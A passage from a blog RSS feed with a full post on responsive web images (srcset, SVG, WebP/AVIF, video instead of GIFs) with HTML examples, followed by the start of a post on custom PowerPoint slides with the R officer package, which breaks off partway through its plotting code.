&lt;p&gt;🎟 &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;Sign up now&lt;/a&gt; and invest in training that actually moves the needle. Whether you&amp;rsquo;re upskilling your team or boosting your own confidence, you’re in the right place.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-train-with-jr-2025-r-python-bayesian-statistics-machine-learning/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Rethinking Image Formats</title><link>https://www.jumpingrivers.com/blog/rethinking-image-formats/</link><pubDate>Thu, 05 Jun 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/rethinking-image-formats/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/rethinking-image-formats/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/rethinking-image-formats/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;link rel="stylesheet" href="assets/style.css" /&gt;
&lt;script src="assets/script.mjs" type="module"&gt;&lt;/script&gt;
&lt;p&gt;Adding images to a web page used to be straightforward. You’d add the &lt;code&gt;img&lt;/code&gt; tag to the HTML, set the &lt;em&gt;src&lt;/em&gt; attribute to the appropriate URL and, hopefully, write some informative &lt;em&gt;alt&lt;/em&gt; text. (You might also add some CSS, either inline or via a stylesheet.)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;img&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;plot.png&amp;#34;&lt;/span&gt; alt&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Scatter plot of age vs score. Line of best fit runs through the points, and an outlier can be seen at age 28, score 40.&amp;#34;&lt;/span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It&amp;rsquo;s slightly more complicated today, with monitor and browser technology changing the requirements, at least if you are using raster images (like JPEGS, PNGs and GIFs) and want things to look good for &lt;em&gt;all&lt;/em&gt; your users. High density screens on smartphones have been popular for a while but 4k and 5k monitors are also becoming more affordable. To make text easy to read, these are often set to 200% scaling so that one measured pixel corresponds to 2 real pixels in each dimension. (For smartphones and tablets this scaling can even be 300%, though their true pixel counts are lower than those of 4k and 5k monitors.) A result of all this is that, for images not to look pixelated on these screens, they need twice as many pixels in each direction - that&amp;rsquo;s four times the number of pixels for a given image display size. So what can we do about this?&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-rethinking-image-formats"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="using-the-srcset-attribute"&gt;Using the &lt;em&gt;srcset&lt;/em&gt; Attribute&lt;/h2&gt;
&lt;p&gt;Fortunately, browsers added the &lt;em&gt;srcset&lt;/em&gt; attribute to make it easier for the developer to specify multiple images to use. The browser then picks the “best” option for a given user based on the information given in the &lt;em&gt;srcset&lt;/em&gt; attribute and information the browser already has about the device on which the page is being viewed. The simplest way to utilise this attribute is to specify an image that is twice as large in the srcset property alongside a &amp;ldquo;2x&amp;rdquo; marker. By convention, we name the larger image the same as the smaller image, but with @2x in the name just before the extension:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;img&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;plot.png&amp;#34;&lt;/span&gt; srcset&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;plot@2x.png 2x&amp;#34;&lt;/span&gt; alt&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Scatter plot of age vs score. Line of best fit runs through the points, and an outlier can be seen at age 28, score 40.&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This tells the browser to serve the base image to users with &amp;ldquo;regular&amp;rdquo; screens and the larger image to those with scaled screens. You could also add a &amp;ldquo;3x&amp;rdquo; version here if you wanted, though that would require an image with nine times as many pixels as the base image. The actual file size in memory may not be nine times that of the base image due to the compression algorithms scaling well, but they&amp;rsquo;ll still be considerably bigger.&lt;/p&gt;
&lt;p&gt;The shortcoming with the above syntax is that it&amp;rsquo;s not really targetting the right thing. It tells the browser to choose based only on scaling factors and not on the actual rendered image sizes. An image could be set to display at 600 &amp;ldquo;CSS&amp;rdquo; pixels on a wide screen, like a desktop monitor, and 300 CSS pixels on a narrower one, like a phone. For a phone with 2 times scaling the 600 pixel image would then look fine but the browser doesn&amp;rsquo;t inherently know that the 1200 pixel image is unnecessary. So it will (probably) load the 1200 pixel image, making page-load slower than necessary and potentially gobbling up more of the user&amp;rsquo;s mobile data than warranted.&lt;/p&gt;
&lt;p&gt;The specification for &lt;em&gt;srcset&lt;/em&gt; offers an alternative that seems to solve this issue: just directly list the widths of available images by specifying a number and the letter &amp;ldquo;w&amp;rdquo;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;img&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; srcset&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;plot-small.png 300w, plot.png 600w, plot-large.png 1200w&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; alt&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Scatter plot of age vs score. Line of best fit runs through the points, and an outlier can be seen at age 28, score 40.&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If the browser knows what size the &lt;code&gt;img&lt;/code&gt; element will be rendered at, the sizes of the image options and the pixel density of the screen it can pick the best image for the job. The catch is that, at least when the browser sees the &lt;code&gt;img&lt;/code&gt; tag for the first time, it won&amp;rsquo;t know what size it will be rendered at unless we specifically tell it. We can do that using the &lt;em&gt;sizes&lt;/em&gt; attribute on the &lt;code&gt;img&lt;/code&gt; element. Unfortunately, for responsive layouts this can get very messy and very confusing very quickly.&lt;/p&gt;
&lt;p&gt;If you want to get into the nitty gritty of using &lt;em&gt;srcset&lt;/em&gt; with &lt;em&gt;sizes&lt;/em&gt; then there is a great article on &lt;a href="https://css-tricks.com/a-guide-to-the-responsive-images-syntax-in-html/" rel="external"&gt;CSS Tricks&lt;/a&gt; that goes into way more detail than we have space for here. Let&amp;rsquo;s, instead, look at alternative ways of reducing the burden of large images.&lt;/p&gt;
&lt;h2 id="using-vector-graphics"&gt;Using Vector Graphics&lt;/h2&gt;
&lt;p&gt;The solution that makes life easy&amp;hellip; when it&amp;rsquo;s applicable. Instead of using a PNG (or JPEG), use an SVG - a scalable vector graphic.&lt;/p&gt;
&lt;h3 id="advantages-of-svg"&gt;Advantages of SVG&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Instead of storing data about the colours of millions of pixels, these files store a set of instruction for constructing an image. This is usually the perfect solution for company logos and most common chart types because they can be scaled however you like precisely because they&amp;rsquo;re just a list of instructions. No need to serve multiple images.&lt;/li&gt;
&lt;li&gt;They can be added to the page in a number of ways, including using a simple &lt;code&gt;img&lt;/code&gt; tag.&lt;/li&gt;
&lt;li&gt;With a bit of JavaScript they can be made interactive and they&amp;rsquo;re easy to animate.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="shortcomings-of-svg"&gt;Shortcomings of SVG&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;They&amp;rsquo;re essentially useless for detailed images, like photography.&lt;/li&gt;
&lt;li&gt;Fonts may not be rendered properly when added through the &lt;em&gt;src&lt;/em&gt; attribute of an image tag if that font isn&amp;rsquo;t already on the users system. A work-around for this is to open a vector-image editor and find the option for rendering text as paths. While this will likely increase the file size a bit and cause minor imperfections in text rendering, it may be more problematic that this adds an extra step in the workflow when the SVGs are generated programatically.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="illustrative-example"&gt;Illustrative example&lt;/h3&gt;
&lt;p&gt;Use the controls below to change between image formats and scaling to see the effect.
It should be apparent that when you scale up a PNG or JPEG the image becomes more blurred
and that the SVG, for the most part, remains crisp regardless of the scale-factor. (You may notice small artefacts with the SVG text when scaled up. These are seen because the characters are rendered using SVG paths rather than fonts, as described in the previous section.)&lt;/p&gt;
&lt;div id="rvc" class="img-demo"&gt;
&lt;label&gt;Select an image&lt;br&gt;&lt;select&gt;&lt;/select&gt;&lt;/label&gt;
&lt;label&gt;Scale factor&lt;br&gt;&lt;input type="number" min="1" value="1"/&gt;&lt;/label&gt;
&lt;span class="info"&gt;&lt;/span&gt;
&lt;div class="img-wrapper"&gt;
&lt;img alt="Litmus dashboard hex logo: a purple hexagon with charts in the background and the words 'Litmus Dashboard' written in the centre." /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2 id="using-new-image-formats"&gt;Using New Image Formats&lt;/h2&gt;
&lt;p&gt;Given the above, you may think the available image options for the web looks something like this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;JPEG (with lossy compression) for images with (up to) millions of colours;&lt;/li&gt;
&lt;li&gt;PNG for images with large consistent blocks of colours (like logos) or images that require transparency;&lt;/li&gt;
&lt;li&gt;SVG for vector graphics;&lt;/li&gt;
&lt;li&gt;GIF for your favourite animated meme.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;But for images that can&amp;rsquo;t be easily represented in vector format there are several newer raster image formats: JPEG XL, WebP, AVIF and HEIC (A.K.A. HEIF) that offer better compression (lossy and lossless) than PNG, JPEG and GIF. Of these new formats, only WebP and AVIF have meaningful browser support, but that support is actually very good: currently &lt;a href="https://caniuse.com/?search=webp" rel="external"&gt;95.4% for WebP&lt;/a&gt; and &lt;a href="https://caniuse.com/?search=avif" rel="external"&gt;93.5% for AVIF&lt;/a&gt;. In fact, you may think support is good enough for both formats to not need to provide a fallback. However, if you want to, you can use the &lt;code&gt;picture&lt;/code&gt; and &lt;code&gt;source&lt;/code&gt; elements to cover even more browsers:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;picture&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;source&lt;/span&gt; srcset&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;/images/home/whale-deep-dive-light-blue.webp 1x, /images/home/whale-deep-dive-light-blue@2x.webp 2x&amp;#34;&lt;/span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;image/webp&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;img&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;/images/home/whale-deep-dive-light-blue.png&amp;#34;&lt;/span&gt; alt&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#39; cartoon whale with Moon in background&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;picture&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In the above example we use the &lt;em&gt;srcset&lt;/em&gt; attribute to provide two different sizes in the WebP format and the &lt;code&gt;img&lt;/code&gt; tag to provide a PNG fallback for older browsers (we assume users of older browsers aren&amp;rsquo;t using modern high-definition screens). The &lt;em&gt;alt&lt;/em&gt; text also still needs to be included in the &lt;code&gt;img&lt;/code&gt; tag rather than moved into the &lt;code&gt;source&lt;/code&gt; or &lt;code&gt;picture&lt;/code&gt; tags.&lt;/p&gt;
&lt;p&gt;When it comes to choosing between WebP and AVIF, WebP has marignally better browser support, but consensus is that AVIF offers better compression. This is maybe not surprising since it&amp;rsquo;s a much newer new format than WebP, which actually turns fifteen in 2025. The downside to that is that we have found support for AVIF in editing tools to be much lower than it is for WebP. That landscape is always changing, however. WebP has one other advantage over AVIF: it supports lossy images &lt;em&gt;with&lt;/em&gt; transparency so if you need small image sizes and transparency it&amp;rsquo;s the only format in town.&lt;/p&gt;
&lt;p&gt;Both WebP and AVIF support image animation but, as you will see in the next section, there&amp;rsquo;s another alternative for replacing our old friend the GIF.&lt;/p&gt;
&lt;p&gt;The example below shows a 300-pixel-wide image of &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;The Catalyst&lt;/a&gt; building in Newcastle, where Jumping Rivers is headquartered. You can choose between viewing a lossless PNG, lossless WebP, lossy JPEG, and a lossy WebP image. The two lossless formats should look the same, but the WebP image is about 20% smaller in file size than the PNG. The lossy images both have &amp;ldquo;medium&amp;rdquo; levels of compression so should be of roughly comparable quality, but not identical (since they use different compression algorithms). The lossy WebP image is only about one third the file size of the JPEG!&lt;/p&gt;
&lt;div id="fmt" class="img-demo"&gt;
&lt;label&gt;Select an image&lt;br&gt;&lt;select&gt;&lt;/select&gt;&lt;/label&gt;
&lt;label&gt;Scale factor&lt;br&gt;&lt;input type="number" min="1" value="1"/&gt;&lt;/label&gt;
&lt;span class="info"&gt;&lt;/span&gt;
&lt;div class="img-wrapper"&gt;
&lt;img alt="Photo of The Catalyst building in Newcastle" /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2 id="using-videos-instead-of-gifs"&gt;Using Videos Instead of GIFs&lt;/h2&gt;
&lt;p&gt;GIFs, particularly animated GIFs, have been a big part of internet culture. However, they are a very old format with large file sizes and poor &lt;a href="https://en.wikipedia.org/wiki/Gamut#:~:text=In%20color%20reproduction%20and%20colorimetry,e.g.%20camera%20or%20visual%20system" rel="external"&gt;colour gamuts&lt;/a&gt;.): they are limited to a max of just 256 different pixel colours. All modern browsers support video natively through the &lt;code&gt;video&lt;/code&gt; element and these offer much better compression and huge colour palettes.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;video&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;assets/hex-dissolve.mp4&amp;#34;&lt;/span&gt; aria-label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Litmusverse hex sticker animation&amp;#34;&lt;/span&gt; autoplay&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;true&amp;#34;&lt;/span&gt; loop&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;true&amp;#34;&lt;/span&gt; muted&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;true&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;&lt;span style="color:#7ee787"&gt;video&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;em&gt;aria-label&lt;/em&gt; attribute is used like the &lt;em&gt;alt&lt;/em&gt; text of an &lt;code&gt;img&lt;/code&gt; element. The other attributes should be fairly self-explanatory: &lt;em&gt;autoplay&lt;/em&gt; tells the browser to play the video automatically, &lt;em&gt;loop&lt;/em&gt; to loop the video around back to the start when it finishes and &lt;em&gt;muted&lt;/em&gt; not to play any sound. The latter is required because, thankfully, browsers will no longer autoplay videos with sound.&lt;/p&gt;
&lt;div class="video-wrapper"&gt;
&lt;video src="assets/hex-dissolve.mp4" aria-label="Litmusverse hex sticker animation" autoplay="true" loop="true" muted="true"&gt;&lt;video&gt;
&lt;/div&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/rethinking-image-formats/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Custom PowerPoints Using {officer}</title><link>https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/</link><pubDate>Thu, 22 May 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;From a purely design perspective, Quarto’s standard PowerPoint output
falls short. It is limited to
&lt;a href="https://quarto.org/docs/presentations/powerpoint.html" rel="external"&gt;seven&lt;/a&gt; layout
options, with the most complex being “Two Content.” The &lt;code&gt;{officer}&lt;/code&gt; R
package offers a powerful alternative for those seeking full control and
customisation.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-custom-powerpoints-using-officer"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="why-powerpoint"&gt;Why PowerPoint?&lt;/h2&gt;
&lt;p&gt;At work, I use a Linux operating system (OS), and at home, I use macOS.
Within my little bubble, it’s easy to forget how much of the market
share Microsoft still holds. It’s &lt;a href="https://gs.statcounter.com/os-market-share/desktop/worldwide/#monthly-202502-202502-bar" rel="external"&gt;estimated that around 70% of the
desktop operating system market share belongs to
Microsoft&lt;/a&gt;.
Many of the clients I work with prefer Microsoft outputs, such as
PowerPoint, over HTML or PDF. Aside from company alignment with
Microsoft, there are a few practical reasons why using PowerPoint with
Quarto can be advantageous:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;No need to be a CSS / LaTeX whizz-kid to produce professional-looking
slides&lt;/li&gt;
&lt;li&gt;Possible (and easy) to edit &lt;em&gt;after&lt;/em&gt; rendering the doc!&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="what-is-officer"&gt;What is {officer}?&lt;/h2&gt;
&lt;p&gt;From
&lt;a href="https://davidgohel.github.io/officer/" rel="external"&gt;davidgohel.github.io/officer&lt;/a&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The officer package lets R users manipulate Word (.docx) and
PowerPoint (*.pptx) documents. In short, one can add images, tables
and text into documents from R. An initial document can be provided;
contents, styles and properties of the original document will then be
available.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This means for this workflow, Quarto is sidestepped altogether, and we
focus entirely on R scripts and R coding.&lt;/p&gt;
&lt;h2 id="how"&gt;How?&lt;/h2&gt;
&lt;p&gt;There are a few ways to use {officer} - I’ll walk through the approach
that I’ve found to be most effective.&lt;/p&gt;
&lt;h3 id="layout-templates"&gt;Layout templates&lt;/h3&gt;
&lt;p&gt;First - you’ll need a PowerPoint presentation that contains template
layout slides. There are no limits to these slides, the format can be as
custom as you like and there can be as many layouts as you want.
Remember - this file doesn’t need any actual slides, it only needs
layouts! To create a layout:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Enter “Slide Master” mode&lt;/li&gt;
&lt;li&gt;Add any content (headers, footers, styling etc) you want to appear
on each slide to the “Slide Master”&lt;/li&gt;
&lt;li&gt;Create a new Layout Slide&lt;/li&gt;
&lt;/ol&gt;
&lt;img src="https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/images/slide_master.png" alt="Slide Master view in PowerPoint." style="display: block; margin: auto;" /&gt;
&lt;p&gt;To insert content from R, the easiest way is via placeholders. These can
be text, tables, images and more. To add a placeholder:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Click “Insert Placeholder” and choose the content type&lt;/li&gt;
&lt;li&gt;If it’s a text placeholder, you can customise the formatting of the
text&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;You can see below that I’ve added some basic Jumping River styling to
mine, and added two placeholders; a text placeholder for a title and an
image placeholder for a plot.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/images/ready_to_add.png" alt="Slide Master view in PowerPoint." style="display: block; margin: auto;" /&gt;
&lt;p&gt;In order to access these placeholders easily from R, it’s better to
rename them:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Home tab&lt;/li&gt;
&lt;li&gt;Click the “Select” dropdown&lt;/li&gt;
&lt;li&gt;Click “Selection pane”&lt;/li&gt;
&lt;li&gt;Select your placeholder and rename&lt;/li&gt;
&lt;/ol&gt;
&lt;img src="https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/images/selection_pane.png" alt="Changing your placeholder names via the selection pane in PowerPoint." style="display: block; margin: auto;" /&gt;
&lt;p&gt;Here I’ve named my image placeholder &lt;em&gt;“plot”&lt;/em&gt;, and my text placeholder
for the slide title, &lt;em&gt;“title”&lt;/em&gt;. Note that it’s also a good idea to name
your layout - just right click and hit rename. In this demo I’ve just
left it as &lt;em&gt;“Title Slide”&lt;/em&gt;.&lt;/p&gt;
&lt;h3 id="the-r-code"&gt;The R code&lt;/h3&gt;
&lt;p&gt;Now that I’ve got my template set up, the rest is in R. First, we load
{officer} and read the PowerPoint document in as an R object.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;officer&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_pptx&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;mytemplate.pptx&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you’ve forgotten your layout / placeholder names, access them through
&lt;code&gt;layout_summary()&lt;/code&gt; and &lt;code&gt;layout_properties()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;layout_summary&lt;/span&gt;(doc)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;layout_properties&lt;/span&gt;(doc, layout &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Title Slide&amp;#34;&lt;/span&gt;, master &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Office Theme&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/images/document_properties.png" alt="Document properties for an officer document object." style="display: block; margin: auto;" /&gt;
&lt;p&gt;Before any content can be added, content is needed! Let’s use the
{palmerpenguins} package to create a simple plot of “Adelie” penguins
data&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;palmerpenguins&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;adelie_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(species &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Adelie&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; bill_length_mm, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; flipper_length_mm)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_linedraw&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Make the background transparent&lt;/span&gt;
